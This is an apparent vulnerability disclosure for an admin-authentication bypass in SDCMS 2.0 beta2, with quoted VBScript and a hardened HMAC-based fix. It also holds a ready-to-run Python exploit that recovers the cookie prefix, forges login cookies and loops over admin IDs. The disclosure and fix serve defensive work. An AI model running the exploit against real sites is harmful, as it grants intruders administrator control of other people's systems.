Brief description:

SDCMS admin backend bypass, straight into the backend. Tested on version 2.0 beta2; other versions were not tested.

Details:
islogin: the method that decides whether the caller is logged in

sub islogin()
    ' No session yet: fall back to the cookies
    if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then
        dim t0,t1,t2
        t0=sdcms.getint(sdcms.loadcookie("adminid"),0)   ' read through loadcookie (see below)
        t1=sdcms.loadcookie("islogin")
        t2=sdcms.loadcookie("loginkey")
        ' This check is terrible: sdcms.strlen(t2)<>50 is the only requirement placed on
        ' loginkey. Any 50 characters pass, and execution continues.
        if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=0 or sdcms.strlen(t2)<>50 then
            sdcms.go "login.asp?act=out"
            exit sub
        else
            dim data
            ' Looks up the administrator by ID; the ID comes straight from the cookie
            data=sdcms.db.dbload(1,"adminid,adminname,adminpass,islock,groupid,g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&t0&"","")
            if ubound(data)<0 then
                sdcms.go "login.asp?act=out"
                exit sub
            else
                ' InStr never returns a negative value, so the first half of this test is dead code
                if instr(data(1,0)&data(2,0),sdcms.decrypt(t1,t2))<0 or data(3,0)=0 then
                    sdcms.go "login.asp?act=out"
                    exit sub
                else
                    adminid=data(0,0)
                    adminname=data(1,0)
                    admin_page_lever=data(5,0)
                    admin_cate_array=data(6,0)
                    admin_cate_lever=data(7,0)
                    if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0
                    if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
                    if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0
                    if clng(admingroupid)<>0 then
                        admin_lever_where=" and menuid in("&admin_page_lever&")"
                    end if
                    ' The forged identity is now promoted into the session
                    sdcms.setsession "adminid",adminid
                    sdcms.setsession "adminname",adminname
                    sdcms.setsession "admingroupid",data(4,0)
                end if
            end if
        end if
    else
        ' Session already present: only reload the group permissions
        data=sdcms.db.dbload(1,"g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&adminid&"","")
        if ubound(data)<0 then
            sdcms.go "login.asp?act=out"
            exit sub
        else
            admin_page_lever=data(0,0)
            admin_cate_array=data(1,0)
            admin_cate_lever=data(2,0)
            if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0
            if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
            if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0
            if clng(admingroupid)<>0 then
                admin_lever_where=" and menuid in("&admin_page_lever&")"
            end if
        end if
    end if
end sub

Why any 50-character loginkey works: VBScript's InStr returns the 1-based position of the needle, or 0 when it is not found; it never returns a negative number. The condition instr(...)<0 therefore cannot be true, so whatever sdcms.decrypt(t1,t2) produces from the forged islogin and loginkey cookies is never actually compared with the stored adminname and adminpass. The only things that still matter are that the adminid cookie names an existing row and that islock for that row is not 0; after that the code writes adminid, adminname and admingroupid into the session and the caller is an administrator.
Proof of vulnerability:

Look at the functions that handle the cookies:

public function loadcookie(t0)
    loadcookie=request.cookies(prefix&t0)
end function

public sub setcookie(byval t0,byval t1)
    response.cookies(prefix&t0)=t1
end sub

prefix

' Variable prefix. If this program is installed more than once under one hosting space, configure a different value for each copy
dim prefix
prefix="1Jb8Ob"

' This value can be recovered by visiting admin/login.asp?act=out: the logout handler writes the prefixed cookie names into the response

sub out
    sdcms.setsession "adminid",""
    sdcms.setsession "adminname",""
    sdcms.setsession "admingroupid",""
    sdcms.setcookie "adminid",""
    sdcms.setcookie "loginkey",""
    sdcms.setcookie "islogin",""
    sdcms.go "login.asp"
end sub
Exploitation: set the cookie prefix&loginkey to any 50 characters and prefix&islogin to anything non-empty, then loop over prefix&adminid (the default administrator is id 1) and visit the admin backend. That is all it takes.
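The procedure above, as an added example: a small Python helper that recovers the cookie prefix from the logout response, forges the three cookies and loops over adminid. This is not SDCMS code and not the original poster's script. It assumes the admin area lives under admin/ relative to the site root, that sdcms.go sends an HTTP redirect (so a bounce to login.asp means the cookies were rejected), and uses target.example as a placeholder host; the Set-Cookie sample is constructed, not captured.

```python
"""
Cookie-bypass helper for the SDCMS 2.0 beta2 islogin() flaw described above.
Added example, not SDCMS code. Assumptions: admin area under admin/, sdcms.go
issues an HTTP redirect, target.example is a placeholder host.
"""
import urllib.error
import urllib.request

COOKIE_SUFFIXES = ("adminid", "islogin", "loginkey")

# Constructed sample of the Set-Cookie headers login.asp?act=out would emit for
# the prefix shown on the page (1Jb8Ob). Not a real capture.
SAMPLE_LOGOUT_SET_COOKIE = [
    "1Jb8Obadminid=; path=/",
    "1Jb8Obloginkey=; path=/",
    "1Jb8Obislogin=; path=/",
    "ASPSESSIONIDAABBCCDD=ABCDEFGHIJKLMNOPQRSTUVWX; path=/",
]


def discover_prefix(set_cookie_headers):
    """Recover the per-install cookie prefix from a logout response.

    sub out clears prefix&"adminid", prefix&"loginkey" and prefix&"islogin",
    so the prefix is whatever string precedes all three suffixes.
    """
    seen_by_prefix = {}
    for header in set_cookie_headers:
        name = header.split("=", 1)[0].strip()
        for suffix in COOKIE_SUFFIXES:
            if name.endswith(suffix):
                prefix = name[: len(name) - len(suffix)]
                seen_by_prefix.setdefault(prefix, set()).add(suffix)
    for prefix, suffixes in seen_by_prefix.items():
        if suffixes == set(COOKIE_SUFFIXES):
            return prefix
    return None


def forge_cookies(prefix, adminid):
    """Build the three cookies islogin() reads when no session exists.

    loginkey only has to be exactly 50 characters, islogin only has to be
    non-empty, and adminid selects the sd_admin row that gets loaded.
    """
    return {
        prefix + "adminid": str(int(adminid)),
        prefix + "islogin": "1",
        prefix + "loginkey": "A" * 50,
    }


def cookie_header(cookies):
    """Serialize a cookie dict into a Cookie request header value."""
    return "; ".join(f"{name}={value}" for name, value in cookies.items())


def looks_logged_in(status, headers):
    """True unless the server bounced us to login.asp (assumed redirect)."""
    location = headers.get("Location", "") or ""
    return status == 200 and "login.asp" not in location


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so the bounce to login.asp stays visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url, cookie_value=None):
    """GET url without following redirects; return (status, headers)."""
    req = urllib.request.Request(url)
    if cookie_value:
        req.add_header("Cookie", cookie_value)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers
    except urllib.error.HTTPError as err:  # 3xx surfaces here because we refused it
        return err.code, err.headers


def try_adminids(admin_url, prefix, id_range):
    """Loop candidate adminid values; return the first one the backend accepts."""
    for adminid in id_range:
        status, headers = fetch(admin_url, cookie_header(forge_cookies(prefix, adminid)))
        if looks_logged_in(status, headers):
            return adminid
    return None


if __name__ == "__main__":
    import sys

    base = (sys.argv[1] if len(sys.argv) > 1 else "http://target.example/").rstrip("/") + "/"
    _, hdrs = fetch(base + "admin/login.asp?act=out")
    found_prefix = discover_prefix(hdrs.get_all("Set-Cookie") or [])
    print("prefix:", found_prefix)
    if found_prefix is not None:
        print("accepted adminid:", try_adminids(base + "admin/", found_prefix, range(1, 21)))
```

Only three cookies are sent; no session cookie is needed because islogin() creates the session itself once the forged cookies pass. If the install uses an empty prefix, discover_prefix returns "" and the cookie names are just adminid, islogin and loginkey.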
Fix:

Modify the function. The cookie path of islogin() has to verify loginkey against something the server actually holds, rather than only checking its length and then relying on a comparison (instr(...)<0) that can never be true.
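To make the root cause concrete, here is an added example (not SDCMS code and not the vendor's fix) that transliterates the cookie branch of islogin() into Python beside one possible hardened design: the server issues loginkey as an HMAC over the identity it vouches for and verifies it with a constant-time compare. The admin rows, the decrypt stand-in and the server secret are constructed placeholders.

```python
"""
Model of SDCMS 2.0 beta2 islogin() beside a hardened variant. Added example:
the VBScript logic is transliterated so the dead InStr check can be exercised;
the hardened version is one possible design, not the vendor's fix.
"""
import hashlib
import hmac

# Constructed sd_admin rows keyed by adminid (stand-ins, not real data).
# islock mirrors the page's check: a row with islock=0 is sent to logout.
ADMIN_ROWS = {
    1: {"adminname": "admin", "adminpass": "e10adc3949ba59abbe56e057f20f883e", "islock": 1},
    2: {"adminname": "editor", "adminpass": "25d55ad283aa400af464c76d713c07ad", "islock": 0},
}

SERVER_SECRET = b"replace-with-a-random-per-install-secret"  # assumption


def vbscript_instr(haystack, needle):
    """VBScript InStr: 1-based index of needle, 0 when absent, never negative.
    That is why the page's test instr(...)<0 can never be true."""
    if needle == "":
        return 1
    pos = haystack.find(needle)
    return pos + 1 if pos >= 0 else 0


def getint(value, default):
    """Stand-in for sdcms.getint: integer value of the cookie or the default."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return default


def vulnerable_islogin(cookies, decrypt, rows=ADMIN_ROWS):
    """The page's cookie branch, line for line. Returns the adminname the
    caller becomes, or None when the code would sdcms.go to login.asp?act=out."""
    t0 = getint(cookies.get("adminid", ""), 0)
    t1 = cookies.get("islogin", "")
    t2 = cookies.get("loginkey", "")
    if len(str(t0)) == 0 or len(t1) == 0 or len(t2) != 50:
        return None
    row = rows.get(t0)
    if row is None:
        return None
    # Dead check: InStr is never < 0, so decrypt(t1, t2) is never really verified.
    if vbscript_instr(row["adminname"] + row["adminpass"], decrypt(t1, t2)) < 0 or row["islock"] == 0:
        return None
    return row["adminname"]


def issue_loginkey(adminid, rows=ADMIN_ROWS, secret=SERVER_SECRET):
    """What a fixed login.asp would set: a MAC over the identity it vouches for.
    Binding adminpass in means a password change invalidates old cookies."""
    row = rows[adminid]
    msg = f"{adminid}:{row['adminname']}:{row['adminpass']}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def hardened_islogin(cookies, rows=ADMIN_ROWS, secret=SERVER_SECRET):
    """Same inputs, but loginkey must equal the server-computed MAC."""
    t0 = getint(cookies.get("adminid", ""), 0)
    row = rows.get(t0)
    if row is None or row["islock"] == 0:
        return None
    expected = issue_loginkey(t0, rows, secret)
    presented = cookies.get("loginkey", "")
    if not hmac.compare_digest(expected, presented):
        return None
    return row["adminname"]


if __name__ == "__main__":
    forged = {"adminid": "1", "islogin": "x", "loginkey": "A" * 50}
    print("vulnerable:", vulnerable_islogin(forged, lambda a, b: "garbage"))
    print("hardened  :", hardened_islogin(forged))
```

The MAC design is still a bearer token: anyone who steals the cookie can replay it until the password changes, so a server-side session store with an opaque random id is the stronger choice. The point of the block is narrower: with the vulnerable check, the forged cookie set yields admin; with the hardened one, only a key the server computed does.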